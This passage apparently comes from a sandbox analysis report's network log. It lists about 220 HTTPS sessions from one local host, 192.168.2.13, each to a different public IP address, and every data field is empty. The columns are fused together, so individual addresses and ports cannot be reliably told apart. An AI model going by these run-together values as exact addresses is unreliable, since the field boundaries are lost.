                                        16825192.168.2.1351736190.35.24.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16826192.168.2.135668684.117.160.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16827192.168.2.1337354145.165.247.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16828192.168.2.133499480.54.83.223443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16829192.168.2.1360422118.154.101.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16830192.168.2.1338598167.184.23.54443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16831192.168.2.136020454.242.174.59443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16832192.168.2.135236874.68.68.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16833192.168.2.135947276.161.167.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16834192.168.2.1338918100.20.237.140443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16835192.168.2.1357264203.175.251.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16836192.168.2.1351412206.201.72.100443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16837192.168.2.1332800208.228.160.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16838192.168.2.133355690.190.123.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16839192.168.2.133589059.4.239.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16840192.168.2.133469295.181.238.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16841192.168.2.135189858.74.94.237443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16842192.168.2.1349444178.22.190.5443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16843192.168.2.1337988209.36.71.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16844192.168.2.1344968195.238.154.143443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16845192.168.2.1336672186.254.111.136443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16846192.168.2.1349458113.45.21.14443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16847192.168.2.134857245.123.135.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16848192.168.2.135865054.91.76.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16849192.168.2.1359590147.36.95.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16850192.168.2.135054836.53.217.188443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16851192.168.2.134242064.239.37.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16852192.168.2.1356884177.124.234.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16853192.168.2.135739651.199.20.76443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16854192.168.2.134223464.131.7.161443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16855192.168.2.1352802186.60.254.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16856192.168.2.1356600102.186.4.249443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16857192.168.2.134826640.75.84.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16858192.168.2.1352246116.37.84.80443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16859192.168.2.1344194105.121.176.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16860192.168.2.1360218196.6.239.212443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16861192.168.2.133662698.171.52.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16862192.168.2.134896479.48.102.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16863192.168.2.134726624.236.13.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16864192.168.2.1354946204.36.42.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16865192.168.2.1356678201.150.247.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16866192.168.2.133871863.53.148.94443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16867192.168.2.1358632184.123.63.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16868192.168.2.1344342125.124.74.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16869192.168.2.1339914170.129.18.110443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16870192.168.2.1353952210.82.162.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16871192.168.2.134533254.55.172.134443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16872192.168.2.133588895.91.242.200443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16873192.168.2.1346458186.124.202.197443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16874192.168.2.1340262112.108.50.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16875192.168.2.134876812.147.217.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16876192.168.2.135957887.172.26.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16877192.168.2.1350476159.145.148.173443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16878192.168.2.1347348139.78.252.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16879192.168.2.1350836155.177.91.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16880192.168.2.135369638.63.38.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16881192.168.2.1357428150.11.19.130443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16882192.168.2.1348422203.2.166.75443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16883192.168.2.1347124140.175.172.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16884192.168.2.1336038160.98.254.164443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16885192.168.2.1349442180.18.70.17443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16886192.168.2.1342262170.41.47.3443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16887192.168.2.133738457.234.102.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16888192.168.2.134978837.128.189.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16889192.168.2.1345632207.136.89.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16890192.168.2.134563047.174.9.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16891192.168.2.134562423.246.95.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16892192.168.2.1354696122.35.118.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16893192.168.2.1336566196.21.218.93443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16894192.168.2.1346500116.9.99.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16895192.168.2.1359030213.3.199.254443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16896192.168.2.133839081.24.228.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16897192.168.2.1339574184.17.198.67443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16898192.168.2.1352070193.157.22.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16899192.168.2.135603464.188.253.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16900192.168.2.1360438172.75.153.9443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16901192.168.2.1343838104.213.51.162443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16902192.168.2.135982023.124.173.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16903192.168.2.1356876198.221.168.32443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16904192.168.2.1336848165.164.143.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16905192.168.2.133438667.127.190.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16906192.168.2.135363695.113.155.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16907192.168.2.1354322114.41.30.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16908192.168.2.1355784181.251.211.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16909192.168.2.1351376117.123.19.154443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16910192.168.2.136098488.246.53.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16911192.168.2.133430266.55.30.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16912192.168.2.1351884153.127.74.255443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16913192.168.2.1352838154.132.71.203443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16914192.168.2.1347840108.121.240.61443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16915192.168.2.1344066184.47.151.107443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16916192.168.2.1339266147.73.188.236443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16917192.168.2.1357238184.175.0.214443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16918192.168.2.1347106168.110.110.41443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16919192.168.2.134778882.159.7.190443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16920192.168.2.1354126138.141.252.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16921192.168.2.1342834146.39.154.20443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16922192.168.2.133599468.119.95.33443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16923192.168.2.133418267.166.115.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16924192.168.2.1356670164.115.77.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16925192.168.2.1360642196.144.19.172443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16926192.168.2.134140086.48.220.139443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16927192.168.2.1340294164.81.71.2443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16928192.168.2.134129854.204.193.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16929192.168.2.134085887.23.100.217443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16930192.168.2.133359613.244.192.21443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16931192.168.2.1349936120.47.61.18443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16932192.168.2.1347372181.14.100.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16933192.168.2.135341690.219.101.71443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16934192.168.2.134186044.142.20.46443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16935192.168.2.134932270.201.20.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16936192.168.2.1336154189.134.236.204443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16937192.168.2.1339350116.214.158.16443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16938192.168.2.135034643.185.159.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16939192.168.2.1354572161.189.77.144443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16940192.168.2.135224078.111.231.55443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16941192.168.2.1358756155.174.242.65443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16942192.168.2.1343206200.179.76.145443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16943192.168.2.1335568124.166.224.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16944192.168.2.135994634.233.129.1443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16945192.168.2.134421495.195.38.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16946192.168.2.1347098130.97.220.84443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16947192.168.2.1343370120.44.205.141443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16948192.168.2.134391019.213.224.178443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16949192.168.2.135270838.206.201.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16950192.168.2.133990831.29.46.246443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16951192.168.2.1350354105.4.51.202443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16952192.168.2.135241253.202.121.158443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16953192.168.2.1340198113.73.237.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16954192.168.2.135614685.60.157.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16955192.168.2.1343684191.7.53.57443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16956192.168.2.135916282.182.222.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16957192.168.2.1346696140.19.164.171443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16958192.168.2.1359596204.156.187.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16959192.168.2.133801097.237.36.194443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16960192.168.2.1352758194.194.77.226443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16961192.168.2.1335140199.148.138.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16962192.168.2.1335566130.141.26.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16963192.168.2.1334520101.65.21.66443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16964192.168.2.1360428168.184.16.114443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16965192.168.2.1351222184.108.129.142443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16966192.168.2.1342794115.167.8.91443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16967192.168.2.135893624.255.123.0443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16968192.168.2.135580888.148.121.230443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16969192.168.2.1347670191.135.223.218443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16970192.168.2.13494461.218.82.105443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16971192.168.2.1354252122.253.184.131443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16972192.168.2.1356042203.253.163.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16973192.168.2.136099096.30.24.156443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16974192.168.2.1339472183.80.18.52443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16975192.168.2.134915619.24.168.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16976192.168.2.1333070177.76.142.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16977192.168.2.1350584169.36.242.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16978192.168.2.1340002196.164.62.177443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16979192.168.2.134866044.102.61.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16980192.168.2.136020443.5.200.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16981192.168.2.134369279.10.134.179443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16982192.168.2.1359922125.178.13.184443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16983192.168.2.1337392123.119.11.99443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16984192.168.2.134098254.245.52.221443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16985192.168.2.1333428150.7.53.232443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16986192.168.2.133902878.158.252.181443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16987192.168.2.1347078100.3.236.183443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16988192.168.2.1345576122.16.192.146443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16989192.168.2.1335108209.24.78.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16990192.168.2.1336630148.235.44.49443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16991192.168.2.135489698.31.87.106443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16992192.168.2.1356372199.116.47.4443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16993192.168.2.13348541.94.18.108443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16994192.168.2.1360098221.135.241.193443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16995192.168.2.1334440220.140.129.38443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16996192.168.2.134504271.93.243.89443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16997192.168.2.135692035.125.68.12443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16998192.168.2.1353992111.8.62.121443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        16999192.168.2.1358002216.71.88.73443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17000192.168.2.133534863.152.5.157443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17001192.168.2.1350640146.231.171.182443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17002192.168.2.1334976132.145.211.206443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17003192.168.2.1350918200.50.103.225443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17004192.168.2.1347480191.137.135.242443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17005192.168.2.1356650181.255.193.138443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17006192.168.2.134869837.132.242.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17007192.168.2.1337366157.179.53.201443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17008192.168.2.134170459.128.41.124443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17009192.168.2.133380227.45.33.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17010192.168.2.13416745.6.44.192443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17011192.168.2.1359890117.237.154.35443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17012192.168.2.1340688123.167.145.119443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17013192.168.2.1359336124.170.20.160443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17014192.168.2.133943679.217.252.79443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17015192.168.2.133312486.66.219.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17016192.168.2.134254441.241.246.25443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17017192.168.2.1341798110.113.159.88443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17018192.168.2.1359618130.242.90.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17019192.168.2.1347006147.46.30.147443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17020192.168.2.1332780124.226.79.187443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17021192.168.2.1353838104.255.18.149443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17022192.168.2.1359984167.61.98.45443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17023192.168.2.1343606126.33.1.231443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17024192.168.2.1334612183.103.0.30443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17025192.168.2.1356744176.16.201.95443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17026192.168.2.1333976104.32.93.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17027192.168.2.134722272.17.113.58443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17028192.168.2.1347380164.3.203.238443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17029192.168.2.135013440.230.89.198443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17030192.168.2.1333540165.184.211.222443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17031192.168.2.1356026111.132.67.213443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17032192.168.2.133794467.73.227.115443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17033192.168.2.1359772104.191.203.56443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17034192.168.2.13393508.96.58.122443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17035192.168.2.1347068155.196.68.215443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17036192.168.2.135375864.118.231.60443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17037192.168.2.134601418.39.22.103443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17038192.168.2.135913439.52.139.72443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17039192.168.2.135761695.108.186.126443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17040192.168.2.1358178191.12.176.40443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17041192.168.2.134438495.90.80.167443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17042192.168.2.1359096126.60.179.70443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17043192.168.2.1352858106.250.91.24443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17044192.168.2.134615879.76.55.152443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17045192.168.2.1345816114.68.141.227443
                                        TimestampBytes transferredDirectionData


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        17046192.168.2.133297070.96.201.127443
                                        TimestampBytes transferredDirectionData


